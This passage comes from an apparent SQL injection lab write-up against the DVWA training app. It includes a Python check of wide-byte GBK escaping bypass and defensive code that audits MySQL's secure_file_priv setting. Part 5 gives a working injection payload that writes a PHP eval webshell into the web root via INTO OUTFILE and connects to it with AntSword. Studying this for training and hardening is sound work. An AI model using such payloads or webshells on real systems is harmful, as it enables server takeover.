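            out.append(0x5C)  # the backslash byte
        out.append(b)
    return bytes(out)


def quote_survives_escaping(raw: bytes, connection_charset: str) -> bool:
    """True if the single quote in `raw` is still escaped after the server decodes
    the escaped bytes under `connection_charset`; False means the escape was lost
    because the backslash was absorbed into a multibyte character."""
    escaped = addslashes(raw)
    decoded = escaped.decode(connection_charset, errors="replace")
    idx = decoded.rfind("'")
    return idx > 0 and decoded[idx - 1] == "\\"


def audit_charsets(raw: bytes, charsets=("gbk", "utf-8")) -> dict:
    """Map each candidate connection charset to whether escaping holds for `raw`."""
    return {cs: quote_survives_escaping(raw, cs) for cs in charsets}


if __name__ == "__main__":
    print("escaped bytes:", addslashes(WIDE_BYTE_INPUT))
    for cs, ok in audit_charsets(WIDE_BYTE_INPUT).items():
        print(f"{cs:6s} -> quote still escaped: {ok}")
```

Under gbk the check fails (the 0xDF 0x5C pair decodes to a single character and the quote stands alone), while under utf-8 the lone 0xDF byte is simply invalid and the backslash is preserved; a plain ASCII input is escaped correctly under both, which is why the defect only shows up when the connection charset and the escaping routine disagree.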

Part 5. Use SQL injection to get a shell on the DVWA site, writing out the attack steps clearly

# Use into outfile to write a one-line PHP webshell, with file name shell2.php
1' union select 1,"<?php eval($_POST['a']);?>" into outfile '/var/www/html/shell2.php' #

Connect to it with the AntSword (蚁剑) tool

Use Hackbar to connect to shell2.php
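The into outfile step in Part 5 only succeeds when the MySQL account has the FILE privilege and the server's secure_file_priv setting permits writing into a directory the web server serves; those server-side settings, not the injection itself, decide whether an injection becomes a shell. The Python script below is an added example (not part of the original assignment) that reads a my.cnf-style configuration text and classifies the secure_file_priv setting, so a reviewer can spot the unrestricted form. The configuration fragments are constructed for the demonstration.

```python
# Constructed my.cnf fragments, not taken from any real server.
WEAK_CNF = """\
[mysqld]
datadir=/var/lib/mysql
# an empty value lifts every restriction on LOAD DATA and SELECT ... INTO OUTFILE
secure_file_priv=""
"""

HARDENED_CNF = """\
[mysqld]
datadir=/var/lib/mysql
# NULL disables server-side file import and export entirely
secure-file-priv = NULL
"""

RESTRICTED_CNF = """\
[mysqld]
secure_file_priv=/var/lib/mysql-files
"""


def mysqld_options(cnf_text: str) -> dict:
    """Options from the [mysqld] group as {normalised_name: value}. MySQL treats
    '-' and '_' in option names as interchangeable, so both are folded to '_'."""
    options, in_mysqld = {}, False
    for raw in cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and surrounding whitespace
        if not line:
            continue
        if line.startswith("["):
            in_mysqld = line.strip("[]").strip().lower() == "mysqld"
            continue
        if not in_mysqld:
            continue
        name, _, value = line.partition("=")
        options[name.strip().lower().replace("-", "_")] = value.strip().strip("\"'")
    return options


def secure_file_priv_status(cnf_text: str) -> str:
    """Classify the secure_file_priv setting:
    'unrestricted' - empty string: INTO OUTFILE may write anywhere mysqld can
    'disabled'     - NULL: server-side file import/export turned off
    'restricted'   - a directory: writes confined to that directory
    'unset'        - absent, so the build/platform default applies"""
    opts = mysqld_options(cnf_text)
    if "secure_file_priv" not in opts:
        return "unset"
    value = opts["secure_file_priv"]
    if value == "":
        return "unrestricted"
    if value.upper() == "NULL":
        return "disabled"
    return "restricted"


if __name__ == "__main__":
    for label, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF), ("restricted", RESTRICTED_CNF)):
        print(f"{label:10s} -> {secure_file_priv_status(cnf)}")
```

The same classification can be applied to the live value returned by SHOW VARIABLES LIKE 'secure_file_priv' on a running server; together with checking that the application's database account lacks the FILE privilege and that the mysqld OS user cannot write to the web root, it closes the path this part of the assignment relies on.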
